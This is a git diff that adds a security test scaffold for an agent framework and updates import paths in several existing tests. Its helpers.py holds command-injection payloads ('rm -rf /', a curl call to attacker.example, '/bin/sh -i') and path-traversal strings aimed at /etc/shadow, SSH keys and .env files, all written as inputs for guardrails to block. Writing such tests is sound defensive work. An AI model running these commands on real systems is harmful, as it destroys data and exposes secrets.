diff --git a/tests/security/__init__.py b/tests/security/__init__.py new file mode 100644 index 0000000..e98fdf4 --- /dev/null +++ b/tests/security/__init__.py @@ -0,0 +1,5 @@ +"""Security test suite for Operator-Use. + +Tests in this package verify that security guardrails are enforced +across tool invocations, file system access, and agent context handling. +""" diff --git a/tests/security/conftest.py b/tests/security/conftest.py new file mode 100644 index 0000000..1831f04 --- /dev/null +++ b/tests/security/conftest.py @@ -0,0 +1,78 @@ +"""Shared fixtures for the security test suite.""" + +import logging +from pathlib import Path +from typing import Generator + +import pytest + + +@pytest.fixture +def tmp_workspace(tmp_path: Path) -> Generator[Path, None, None]: + """Isolated temporary directory simulating an agent workspace. + + Creates a directory tree that mirrors the structure an agent would + operate in: a workspace root with ``files/`` and ``logs/`` subdirs. + The fixture yields the workspace root and guarantees cleanup after + the test, even on failure. + + Yields: + Path: The root of the isolated workspace. + """ + workspace = tmp_path / "workspace" + workspace.mkdir() + (workspace / "files").mkdir() + (workspace / "logs").mkdir() + yield workspace + # tmp_path cleanup is handled by pytest automatically + + +@pytest.fixture +def mock_agent_context(tmp_workspace: Path) -> dict: + """Minimal agent context dictionary for tool testing. + + Provides the smallest set of keys required by tools under test so + that individual security tests do not need to construct full agent + objects. + + Args: + tmp_workspace: The isolated workspace fixture. + + Returns: + dict: A context mapping with ``workspace``, ``agent_id``, and + ``permissions`` keys. + """ + return { + "workspace": tmp_workspace, + "agent_id": "test-agent-001", + "permissions": { + "read": True, + "write": True, + "execute": False, + "network": False, + }, + } + + +@pytest.fixture +def capture_logs( + caplog: pytest.LogCaptureFixture, +) -> Generator[pytest.LogCaptureFixture, None, None]: + """Fixture to capture and inspect log output during a test. + + Sets the root logger to DEBUG level for the duration of the test so + that security-related log lines emitted at any level are visible. + + Yields: + pytest.LogCaptureFixture: The caplog object; use + ``capture_logs.records`` or ``capture_logs.text`` to inspect + what was logged. + + Example:: + + def test_blocked_action_is_logged(capture_logs): + trigger_blocked_action() + assert any("blocked" in r.message.lower() for r in capture_logs.records) + """ + with caplog.at_level(logging.DEBUG): + yield caplog diff --git a/tests/security/helpers.py b/tests/security/helpers.py new file mode 100644 index 0000000..dfd3af3 --- /dev/null +++ b/tests/security/helpers.py @@ -0,0 +1,126 @@ +"""Utilities shared across the security test suite. + +Provides payload generators and common assertion helpers so individual +test modules do not need to duplicate attack-string lists or outcome +checks. +""" + +from __future__ import annotations + +from typing import Callable + + +# --------------------------------------------------------------------------- +# Payload generators +# --------------------------------------------------------------------------- + + +def path_traversal_payloads() -> list[str]: + """Return a list of path traversal attack strings. + + Each entry is a filename or path fragment that should be rejected by + any file-access guardrail. The list covers classic ``../`` sequences, + URL-encoded variants, and absolute-path injections. + + Returns: + list[str]: Distinct traversal payload strings. + """ + return [ + "../../../etc/passwd", + "..\\..\\..\\windows\\system32\\config\\sam", + "%2e%2e%2f%2e%2e%2fetc%2fpasswd", + "....//....//etc/passwd", + "/etc/shadow", + "~/.ssh/id_rsa", + "../../.env", + "../tests/secret.txt", + ] + + +def command_injection_payloads() -> list[str]: + """Return a list of command injection attack strings. + + Each entry is a shell fragment that should be rejected when provided + as a parameter to any tool that constructs shell commands. + + Returns: + list[str]: Distinct injection payload strings. + """ + return [ + "; rm -rf /", + "| cat /etc/passwd", + "&& curl http://attacker.example/exfil", + "`whoami`", + "$(id)", + "'; DROP TABLE users; --", + "\n/bin/sh -i", + "${IFS}cat${IFS}/etc/passwd", + ] + + +# --------------------------------------------------------------------------- +# Assertion helpers +# --------------------------------------------------------------------------- + + +def assert_blocked(result: object, *, check: Callable[[object], bool] | None = None) -> None: + """Assert that a tool result represents a blocked / denied operation. + + Checks the common ``success`` attribute used by ``ToolResult``. + Optionally runs an extra callable ``check`` for domain-specific + validation. + + Args: + result: The return value from a tool invocation. + check: Optional extra predicate; raises ``AssertionError`` if it + returns ``False``. + + Raises: + AssertionError: When the result indicates success or the optional + check fails. + + Example:: + + result = await tool.ainvoke(path="../../../etc/passwd") + assert_blocked(result, check=lambda r: "traversal" in (r.error or "").lower()) + """ + assert hasattr(result, "success"), ( + f"Expected a ToolResult-like object with a 'success' attribute, got {type(result)}" + ) + assert result.success is False, ( + f"Expected operation to be blocked (success=False) but got success={result.success!r}" + ) + if check is not None: + assert check(result), f"Extra check failed for blocked result: {result!r}" + + +def assert_allowed(result: object, *, check: Callable[[object], bool] | None = None) -> None: + """Assert that a tool result represents a permitted / successful operation. + + Checks the common ``success`` attribute used by ``ToolResult``. + Optionally runs an extra callable ``check`` for domain-specific + validation. + + Args: + result: The return value from a tool invocation. + check: Optional extra predicate; raises ``AssertionError`` if it + returns ``False``. + + Raises: + AssertionError: When the result indicates failure or the optional + check fails. + + Example:: + + result = await tool.ainvoke(path="safe_file.txt") + assert_allowed(result, check=lambda r: r.output is not None) + """ + assert hasattr(result, "success"), ( + f"Expected a ToolResult-like object with a 'success' attribute, got {type(result)}" + ) + assert result.success is True, ( + f"Expected operation to be allowed (success=True) but got success={result.success!r}, " + f"error={getattr(result, 'error', None)!r}" + ) + if check is not None: + assert check(result), f"Extra check failed for allowed result: {result!r}" diff --git a/tests/security/test_scaffold.py b/tests/security/test_scaffold.py new file mode 100644 index 0000000..d35a7ab --- /dev/null +++ b/tests/security/test_scaffold.py @@ -0,0 +1,142 @@ +"""Example security test that validates the scaffold itself. + +Serves as the acceptance-criteria "at least one example security test +passes using the scaffold" required by issue #7. It also acts as +living documentation showing how Phase 1 security tests should be +structured. +""" + +from pathlib import Path +from typing import NamedTuple + +import pytest + +from tests.security.helpers import ( + assert_allowed, + assert_blocked, + command_injection_payloads, + path_traversal_payloads, +) + + +# --------------------------------------------------------------------------- +# Minimal stub that mimics the ToolResult interface +# --------------------------------------------------------------------------- + + +class _StubResult(NamedTuple): + success: bool + output: str | None = None + error: str | None = None + + +# --------------------------------------------------------------------------- +# Fixture smoke tests +# --------------------------------------------------------------------------- + + +def test_tmp_workspace_is_isolated_directory(tmp_workspace: Path) -> None: + """tmp_workspace provides a fresh, writable directory per test.""" + assert tmp_workspace.exists() + assert tmp_workspace.is_dir() + sentinel = tmp_workspace / "sentinel.txt" + sentinel.write_text("ok") + assert sentinel.read_text() == "ok" + + +def test_tmp_workspace_contains_expected_subdirs(tmp_workspace: Path) -> None: + """tmp_workspace pre-creates files/ and logs/ subdirectories.""" + assert (tmp_workspace / "files").is_dir() + assert (tmp_workspace / "logs").is_dir() + + +def test_mock_agent_context_keys(mock_agent_context: dict) -> None: + """mock_agent_context contains required keys for tool testing.""" + required_keys = {"workspace", "agent_id", "permissions"} + assert required_keys.issubset(mock_agent_context.keys()) + + +def test_mock_agent_context_workspace_is_path(mock_agent_context: dict) -> None: + """mock_agent_context workspace value is a Path pointing to tmp_workspace.""" + assert isinstance(mock_agent_context["workspace"], Path) + assert mock_agent_context["workspace"].exists() + + +def test_capture_logs_captures_debug_messages(capture_logs) -> None: + """capture_logs fixture intercepts log records at DEBUG level.""" + import logging + + logger = logging.getLogger("operator_use.security.test") + logger.debug("scaffold-debug-sentinel") + assert any("scaffold-debug-sentinel" in r.message for r in capture_logs.records) + + +# --------------------------------------------------------------------------- +# Helper function tests +# --------------------------------------------------------------------------- + + +def test_path_traversal_payloads_returns_nonempty_list() -> None: + """path_traversal_payloads() returns at least one payload.""" + payloads = path_traversal_payloads() + assert len(payloads) > 0 + assert all(isinstance(p, str) for p in payloads) + + +def test_path_traversal_payloads_contain_dotdot() -> None: + """path_traversal_payloads() includes classic ../ traversals.""" + payloads = path_traversal_payloads() + assert any(".." in p for p in payloads) + + +def test_command_injection_payloads_returns_nonempty_list() -> None: + """command_injection_payloads() returns at least one payload.""" + payloads = command_injection_payloads() + assert len(payloads) > 0 + assert all(isinstance(p, str) for p in payloads) + + +def test_command_injection_payloads_contain_shell_operators() -> None: + """command_injection_payloads() includes common shell operator chars.""" + payloads = command_injection_payloads() + shell_chars = set(";|&`$") + assert any(shell_chars & set(p) for p in payloads) + + +# --------------------------------------------------------------------------- +# assert_blocked / assert_allowed helper tests +# --------------------------------------------------------------------------- + + +def test_assert_blocked_passes_on_failure_result() -> None: + """assert_blocked does not raise when result.success is False.""" + assert_blocked(_StubResult(success=False, error="denied")) + + +def test_assert_blocked_raises_on_success_result() -> None: + """assert_blocked raises AssertionError when result.success is True.""" + with pytest.raises(AssertionError, match="blocked"): + assert_blocked(_StubResult(success=True, output="ok")) + + +def test_assert_blocked_raises_when_extra_check_fails() -> None: + """assert_blocked raises when the optional check predicate returns False.""" + with pytest.raises(AssertionError, match="Extra check failed"): + assert_blocked(_StubResult(success=False, error="denied"), check=lambda _: False) + + +def test_assert_allowed_passes_on_success_result() -> None: + """assert_allowed does not raise when result.success is True.""" + assert_allowed(_StubResult(success=True, output="ok")) + + +def test_assert_allowed_raises_on_failure_result() -> None: + """assert_allowed raises AssertionError when result.success is False.""" + with pytest.raises(AssertionError, match="allowed"): + assert_allowed(_StubResult(success=False, error="denied")) + + +def test_assert_allowed_raises_when_extra_check_fails() -> None: + """assert_allowed raises when the optional check predicate returns False.""" + with pytest.raises(AssertionError, match="Extra check failed"): + assert_allowed(_StubResult(success=True, output="ok"), check=lambda _: False) diff --git a/tests/test_agent.py b/tests/test_agent.py index 4fb6c3f..13db174 100644 --- a/tests/test_agent.py +++ b/tests/test_agent.py @@ -186,7 +186,7 @@ async def test_agent_run_with_tool_call_then_text(tmp_path): # Register a simple echo tool from pydantic import BaseModel - from operator_use.tools.service import Tool + from operator_use.agent.tools.service import Tool class EchoParams(BaseModel): message: str diff --git a/tests/test_control_center.py b/tests/test_control_center.py index f3a2e5b..0efe749 100644 --- a/tests/test_control_center.py +++ b/tests/test_control_center.py @@ -4,7 +4,7 @@ import pytest from unittest.mock import AsyncMock, MagicMock, patch -from operator_use.agent.tools.builtin.control_center import ( +from operator_use.tools.control_center import ( control_center, _set_plugin_enabled, _get_plugin_enabled, diff --git a/tests/test_local_agents.py b/tests/test_local_agents.py index 8fd831b..a1b5168 100644 --- a/tests/test_local_agents.py +++ b/tests/test_local_agents.py @@ -2,7 +2,7 @@ import pytest -from operator_use.agent.tools.builtin.local_agents import LOCAL_AGENT_DELEGATION_CHAIN, localagents +from operator_use.tools.local_agents import LOCAL_AGENT_DELEGATION_CHAIN, localagents from operator_use.messages.service import AIMessage diff --git a/tests/test_plugins.py b/tests/test_plugins.py index f6ba6d4..5d9f8b9 100644 --- a/tests/test_plugins.py +++ b/tests/test_plugins.py @@ -7,7 +7,7 @@ from operator_use.agent.tools.registry import ToolRegistry from operator_use.agent.hooks.service import Hooks from operator_use.agent.hooks.events import HookEvent -from operator_use.tools.service import Tool +from operator_use.agent.tools.service import Tool from pydantic import BaseModel diff --git a/tests/test_tool_registry.py b/tests/test_tool_registry.py index ca6ed75..77c70b9 100644 --- a/tests/test_tool_registry.py +++ b/tests/test_tool_registry.py @@ -4,7 +4,7 @@ from pydantic import BaseModel from operator_use.agent.tools.registry import ToolRegistry -from operator_use.tools.service import Tool +from operator_use.agent.tools.service import Tool # --- Helpers --- diff --git a/tests/test_tools.py b/tests/test_tools.py index 8cbf913..de572ab 100644 --- a/tests/test_tools.py +++ b/tests/test_tools.py @@ -4,7 +4,7 @@ from pydantic import BaseModel from typing import Literal -from operator_use.tools.service import Tool, ToolResult +from operator_use.agent.tools.service import Tool, ToolResult # --- ToolResult ---